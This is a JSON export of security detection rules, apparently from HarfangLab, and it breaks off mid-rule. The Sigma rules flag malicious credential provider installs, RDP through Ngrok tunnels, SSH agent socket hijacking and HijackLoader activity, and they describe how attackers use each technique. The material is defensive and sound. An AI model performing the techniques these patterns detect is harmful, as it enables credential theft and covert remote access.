"https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kcredentialprovider.c",
"https://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/",
"https://attack.mitre.org/techniques/T1556/002/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1556_002_credential_provider.yml",
"content": "title: New Credential Provider Installed\nid: 49c89875-fa13-4a83-a71b-911e70858184\ndescription: |\n Detects the installation of a new credential provider.\n Attackers can install a new credential provider in order to obtain user credentials. For instance, Mimikatz has this feature.\n It is recommended to analyze the DLL pointed to by the registry key and the process responsible for the registry modification to determine the legitimacy of this action.\nreferences:\n - https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kcredentialprovider.c\n - https://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/\n - https://attack.mitre.org/techniques/T1556/002/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2021/06/17\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1556.002\n - attack.t1003\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{????????-????-????-????-????????????}\\(Default)'\n - 'HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{????????-????-????-????-????????????}\\(Default)'\n # https://docs.microsoft.com/fr-fr/windows/security/identity-protection/hello-for-business/feature-multifactor-unlock\n\n exclusion_multifactor:\n TargetObject|startswith:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}\\'\n - 
'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\'\n # C:\\Program Files (x86)\\Splashtop\\Splashtop Remote\\AutoUpdate\\SRAuto.exe\n exclusion_splashtop:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{97E1814E-5601-41c8-9971-10C319EF61CC}\\'\n # N-able Take Control Agent\n exclusion_n-able:\n TargetObject|startswith:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{0F5FAA20-61D6-4779-8DB3-F200E213DBAC}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{7BA8AD85-A98B-4689-A665-6AA987A67F2F}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{CB10239D-DDC0-4474-A462-B03D990BCD11}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{3BAB084B-F669-490F-BD07-54F50E99A93C}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{FAD0AA98-7868-4F9E-832B-B75FCBC1BB3D}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{611B4F8B-6D16-4FA8-B5C1-B0778DABDBDC}\\'\n Details|startswith: 'MSPACredentialProvider_' # MSPACredentialProvider_7.00.26.202107081422_LOGICnow\n exclusion_fortinet:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{AC7DD106-EAB6-4b41-AC4F-D52FD62A82C7}\\'\n Details:\n - 'FortiCredentialProvider'\n - 'FortiCredentialProvider?' 
# \"FortiCredentialProvider\\u0000\"\n # GoToAssist Remote Support\n # Parent Image: C:\\Program Files (x86)\\GoToAssist Remote Support Customer\\1702\\g2ax_service.exe\n # \"C:\\WINDOWS\\system32\\regsvr32.exe\" /s C:\\WINDOWS\\system32\\g2ax_credential_provider64_1702.dll\n exclusion_logmein_gotoassist_remote_support:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{D025C57A-763E-4B14-B580-9B5B161F08BB}\\'\n Details:\n - 'RemoteCredentialProvider'\n - 'RemoteCredentialProvider?' # \"RemoteCredentialProvider\\u0000\"\n exclusion_vaultcredprovider:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{503739d0-4c5e-4cfd-b3ba-d881334f0df2}\\'\n Details: 'VaultCredProvider'\n exclusion_pulse:\n TargetObject|startswith:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{C1258FBC-F04F-4862-B78A-DDAAEF4A9707}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{4B9CAC01-6732-40d0-8B8F-B5B340F9D44F}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{4EFD0F35-BFBA-44eb-8F25-2B3530203C1D}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{EAB1A79F-DFAA-4faf-A7B9-A6652E97EE16}\\'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{C1258FBC-F04F-4862-B78A-DDAAEF4A9707}\\'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{EAB1A79F-DFAA-4faf-A7B9-A6652E97EE16}\\'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{4B9CAC01-6732-40d0-8B8F-B5B340F9D44F}\\'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential 
Providers\\{4EFD0F35-BFBA-44eb-8F25-2B3530203C1D}\\'\n Details:\n - 'Pulse Secure SSO OneX Smartcard Credential Provider'\n - 'Pulse Secure SSO OneX Password Credential Provider Class'\n - 'Pulse Secure SSO OneX Password Credential Provider'\n - 'Pulse Secure SSO Password Credential Provider Class'\n - 'Pulse Secure SSO Password Credential Provider'\n - 'Pulse Secure SSO Smartcard Credential Provider Class'\n - 'Pulse Secure SSO Smartcard Credential Provider'\n\n exclusion_citrix1:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{81C8E4DC-B376-4D88-BCCD-BD0DD65BEE2B}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{1D7BE727-4560-4adf-9ED8-5EEC78C6ECFF}\\(Default)'\n Details:\n - 'CitrixMirrorCredentialProvider'\n - 'CtxKerbProvider'\n\n exclusion_citrix2:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{5B340FA8-5C3F-45de-87C8-487ABE91013E}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{6D050C58-74E0-40f0-87F6-FDD115B589F8}\\(Default)'\n Details:\n - 'Citrix SSOn Credential Provider'\n - 'Citrix SSOn SCard Credential Provider'\n\n exclusion_citrix3:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{DD1E7148-DD8F-486F-9358-D011E43C962D}\\(Default)'\n Details: 'CitrixCredV2'\n\n exclusion_share_mouse:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{1EDBF04D-03A6-4589-9CB4-89DC03FD175A}\\'\n Details: 'ShareMouseCredentialProvider'\n\n exclusion_setupplatform:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{C885AA15-1764-4293-B82A-0586ADD46B35}\\'\n Details: 'IrisCredentialProvider'\n\n exclusion_shrewsoft_vpn:\n 
TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{F2BE9143-5D0A-4a2e-9335-CEA61ED7244E}\\'\n Details: 'ShrewSoftCredentialProvider'\n\n exclusion_paloalto_gps:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{25CA8579-1BD8-469c-B9FC-6AC45A161C18}\\'\n Details:\n - 'PanCredProv'\n - 'PanV2CredProv'\n\n exclusion_fido:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{2D8B3101-E025-480D-917C-835522C7F628}\\'\n Details: 'FIDO Credential Provider'\n\n exclusion_logonexpert:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{CB7C9FD8-2878-4d5d-9FB0-7B82DC11B2D2}\\'\n Details: 'LogonExpertCP'\n\n exclusion_remote_ngc:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{A910D941-9DA9-4656-8933-AA1EAE01F76E}\\'\n Details: 'Remote NGC Credential Provider'\n\n exclusion_hp_alm:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{7FFB76D2-64C1-47b4-9330-88F8C479B332}\\'\n Details: 'AlmRemoteAgentCredentialProvider'\n\n exclusion_thegreenbow:\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{D079D17E-F83F-4507-BB06-8C215928AE3F}\\'\n Details: 'TgbCredProv'\n\n exclusion_onex:\n TargetObject|startswith:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{07AA0886-CC8D-4e19-A410-1C75AF686E62}\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{33c86cd6-705f-4ba1-9adb-67070b837775}\\'\n Details:\n - 'OnexCredentialProvider'\n - 'OnexPlapSmartcardCredentialProvider'\n\n exclusion_uipath:\n Image: '?:\\Program Files 
(x86)\\UiPath\\Studio\\UiPath.Service.Host.exe'\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{78F48D37-36D7-4D3D-B849-040CCB7D81D2}\\'\n Details|contains: 'UiPathCredentialsProvider' # \"UiPathCredentialsProvider\\u0000XX\", with XX being garbage data\n\n # Automation Anywhere\n exclusion_anywhere:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{75A22DF0-B81D-46ed-B119-CD30507BD620}\\(Default)'\n Details: 'Automation.CredentialProvider_v11'\n\n exclusion_signandgo:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{FFE3B451-4C8D-4061-A2E5-A21C1D0FE2F3}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{0372E9C9-BED1-4332-A335-813837B54AA5}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{266fcc23-c4de-4ee8-be6b-31efb036df17}\\(Default)'\n Details:\n - 'sngCredentialProvider'\n - 'sngWrapCredentialProvider1'\n - 'sngWrapCredentialProvider2'\n\n exclusion_watchguard:\n # Watchguard VPN Client (powered by NCP)\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{B4841AC3-BB3F-4bbf-8F90-E25B45EF4CB4}\\(Default)'\n Details: 'NcpCredentialProvider' # C:\\Windows\\system32\\NcpCredentialProvider.dll\n\n # Novell ZENworks\n exclusion_novell:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{692D4DB6-7E51-4370-A9AE-AE95848DBF1E}\\(Default)'\n Details: 'ZenCredentialProvider'\n\n exclusion_duo:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{44E2ED41-48C7-4712-A3C3-250C5E6D5D84}\\(Default)'\n Details: 'CDuoPasswordCredentialProvider Class'\n\n exclusion_privileged_session_manager:\n TargetObject:\n - 
'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{FDDA5F4A-0396-4E85-8EE5-0203D91791AB}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{FDDA5F4A-0396-4E85-8EE5-0203D91791AA}\\(Default)'\n Details:\n - 'PSMSmartcardCredentialProvider'\n - 'PSMCredentialProvider'\n\n exclusion_kace:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{53EADCDF-631A-4f13-9B42-724CBDDA943E}\\(Default)'\n Details: 'KaceCredentialProvider'\n\n # Cisco AnyConnect\n exclusion_cisco:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{B12744B8-5BB7-463a-B85E-BB7627E73002}\\(Default)'\n Details: 'acNamPwdCredProvider'\n\n exclusion_landesk:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{D2EEC341-83A7-41BC-9407-FA6ED9991C09}\\(Default)'\n Details: 'LANDesk Credential Provider'\n\n exclusion_PwdMgmtProvider:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{3DD6481A-A712-4c4c-88FF-6DDCAB28DE86}\\(Default)'\n Details: 'PwdMgmtProvider'\n\n exclusion_bomgar:\n ProcessCommandLine: '?:\\ProgramData\\bomgar-scc-0x????????\\bomgar-scc.exe -service:run'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n Details: 'cp'\n\n exclusion_baramundi:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{14BF5F29-7118-438e-81B4-26007D34FCCF}\\(Default)'\n Details: 'baramundiAutoLogOnProvider'\n\n exclusion_rdagent:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{f64945df-4fa9-4068-a2fb-61af319edd33}\\(Default)'\n Details: 'RdpCredentialProvider'\n\n exclusion_zonecentral:\n TargetObject: 
'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{00001043-8804-4CA8-8868-36F59DEFD14D}\\(Default)'\n Details: 'ZC Credential Provider'\n\n exclusion_evidian:\n ProcessImage|endswith: '\\WGSens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'EVIDIAN SA'\n Details:\n - 'E-SSOPwdCredProvider'\n - 'E-SSOTokenCredProvider'\n - 'E-SSOBioCredProvider'\n - 'E-SSORFIDCredProvider'\n - 'E-SSOClusterCredProvider'\n - 'E-SSOResetSecretCredProvider'\n - 'E-SSOMobileCredProvider'\n\n exclusion_beyondtrust:\n ProcessSigned: 'true'\n ProcessSignature: 'Bomgar Corporation'\n ProcessImage|endswith: '\\bomgar-scc.exe'\n Details: 'cp'\n\n exclusion_imprivata:\n ProcessImage: '?:\\Program Files (x86)\\Imprivata\\OneSign Agent\\x64\\ISXCredProvDiag.exe'\n\n exclusion_imprivata_msiexec:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-381B-42A5-893E-BBF09122F76A}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-56A3-B1C6-A65B-377AC634DC09}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-781C-617B-0100-128274950001}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-781C-617B-0100-128274950011}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-781C-617B-0100-128274950012}\\(Default)'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{11660363-AB6B-83D3-9CDA-FB2DF5ED7435}\\(Default)'\n Details: 'OneSign Credential Provider'\n\n exclusion_cryhod:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{00000038-8804-9CA8-8868-36F59DEFD14D}\\(Default)'\n Details: 'CY Credential Provider'\n\n exclusion_programfiles:\n 
Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_msiexec:\n - ProcessImage:\n - '?:\\windows\\system32\\msiexec.exe'\n - '?:\\windows\\syswow64\\msiexec.exe'\n - ProcessParentImage:\n - '?:\\windows\\system32\\msiexec.exe'\n - '?:\\windows\\syswow64\\msiexec.exe'\n\n exclusion_userlocker:\n ProcessSigned: 'true'\n ProcessSignature: 'IS Decisions SA'\n ProcessImage: '?:\\Windows\\SysWOW64\\UlAgentExe.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "49c89875-fa13-4a83-a71b-911e70858184",
"rule_name": "New Credential Provider Installed",
"rule_description": "Detects the installation of a new credential provider.\nAttackers can install a new credential provider in order to obtain user credentials. For instance, Mimikatz has this feature.\nIt is recommended to analyze the DLL pointed to by the registry key and the process responsible for the registry modification to determine the legitimacy of this action.\n",
"rule_creation_date": "2021-06-17",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1556.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "49ed1286-c309-4fb0-bcfc-67f8039069c4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628102Z",
"creation_date": "2026-03-23T11:45:34.628104Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628108Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1519710302820089857",
"https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel",
"https://attack.mitre.org/software/S0508/",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1090_ngrok_tunneling_source_address.yml",
"content": "title: RDP Logon via Ngrok Tunnel\nid: 49ed1286-c309-4fb0-bcfc-67f8039069c4\ndescription: |\n Detects the usage of Ngrok to connect to the local RDP service remotely.\n Ngrok is a tool that allows users to expose their local servers to the Internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\n It is recommended to investigate the activity of the user in the RDP session.\nreferences:\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/software/S0508/\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/02/12\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.s0508\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Tool.Ngrok\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection_network:\n SourceIp:\n - '::1'\n - '::ffff:7f00:1'\n - '127.0.0.1'\n - '::ffff:127.0.0.1'\n DestinationIp:\n - '::1'\n - '127.0.0.1'\n - '::ffff:7f00:1'\n - '::ffff:127.0.0.1'\n DestinationPort: '3389'\n Initiated: 'true'\n\n selection_proc:\n - ProcessImage|endswith: '\\ngrok.exe'\n - ProcessOriginalFileName: 'ngrok.exe'\n - ProcessProduct: 'ngrok agent'\n - ProcessImphash: 'FF9F3A86709796C17211F9DF12AAE74D'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "49ed1286-c309-4fb0-bcfc-67f8039069c4",
"rule_name": "RDP Logon via Ngrok Tunnel",
"rule_description": "Detects the usage of Ngrok to connect to the local RDP service remotely.\nNgrok is a tool that allows users to expose their local servers to the Internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\nIt is recommended to investigate the activity of the user in the RDP session.\n",
"rule_creation_date": "2023-02-12",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4a11a4e5-5039-4595-9c44-2407ad083066",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612568Z",
"creation_date": "2026-03-23T11:45:34.612572Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612579Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://embracethered.com/blog/posts/2022/ttp-diaries-ssh-agent-hijacking/",
"https://attack.mitre.org/techniques/T1563/001/"
],
"name": "t1563_001_ssh_session_hijacking_linux.yml",
"content": "title: SSH Session Hijacking (Linux)\nid: 4a11a4e5-5039-4595-9c44-2407ad083066\ndescription: |\n Detects the execution of the ssh binary with the SSH_AUTH_SOCKET variable being set to an ssh-agent UNIX socket in the command-line.\n Attackers may use this to query SSH Agent sockets of other users or services and leverage private keys for which they did not have access.\n It is recommended to investigate any traces of compromise in the machine where this SSH connection began, and to closely monitor the target machine to determine if the connection is malicious.\nreferences:\n - https://embracethered.com/blog/posts/2022/ttp-diaries-ssh-agent-hijacking/\n - https://attack.mitre.org/techniques/T1563/001/\ndate: 2024/03/04\nmodified: 2025/11/10\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - 'SSH_AUTH_SOCK=/tmp/ssh-????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-?????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-??????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-???????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-?????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-??????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-???????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-????????????/agent'\n\n exclusion_image:\n Image:\n - '/usr/bin/env'\n - '/usr/bin/systemctl'\n - '/usr/bin/echo'\n - '*/_bazel_steeve/*/process-wrapper'\n\n exclusion_env:\n CommandLine|contains|all:\n - 'DESKTOP_SESSION='\n - 'PATH=/usr/local/sbin:'\n - 'LANG='\n - 'PWD=/home/'\n - 'SSH_AGENT_PID='\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4a11a4e5-5039-4595-9c44-2407ad083066",
"rule_name": "SSH Session Hijacking (Linux)",
"rule_description": "Detects the execution of the ssh binary with the SSH_AUTH_SOCK environment variable set to an ssh-agent UNIX socket in the command line.\nAttackers may use this to query the SSH agent sockets of other users or services and leverage private keys to which they did not have access.\nIt is recommended to investigate any traces of compromise on the machine where this SSH connection began, and to closely monitor the target machine to determine whether the connection is malicious.\n",
"rule_creation_date": "2024-03-04",
"rule_modified_date": "2025-11-10",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4a1e6461-19e3-4d1c-98d6-49e65f012252",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083062Z",
"creation_date": "2026-03-23T11:45:34.083064Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083068Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/012/",
"https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader",
"https://www.crowdstrike.com/blog/hijackloader-expands-techniques/"
],
"name": "t1055_012_suspicious_file_execution_hijackloader.yml",
"content": "title: Execution Related to HijackLoader\nid: 4a1e6461-19e3-4d1c-98d6-49e65f012252\ndescription: |\n Detects the execution of the 32 bits version of more.com.\n HijackLoader executes the 32 bits version of more.com from the malware for process hollowing purposes.\n HijackLoader is a defense evasion oriented loader relying mostly on DLL Sideloading and a custom variant of Process Hollowing.\n It usually drops Stealers as final payloads.\n It is recommended to check any children of the more.com process and the activities of the parent for other malicious behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/012/\n - https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader\n - https://www.crowdstrike.com/blog/hijackloader-expands-techniques/\ndate: 2024/09/16\nmodified: 2025/03/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Loader.HijackLoader\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_process:\n Image: '?:\\Windows\\SysWOW64\\more.com'\n ParentImage|endswith:\n - '\\setup.exe'\n - 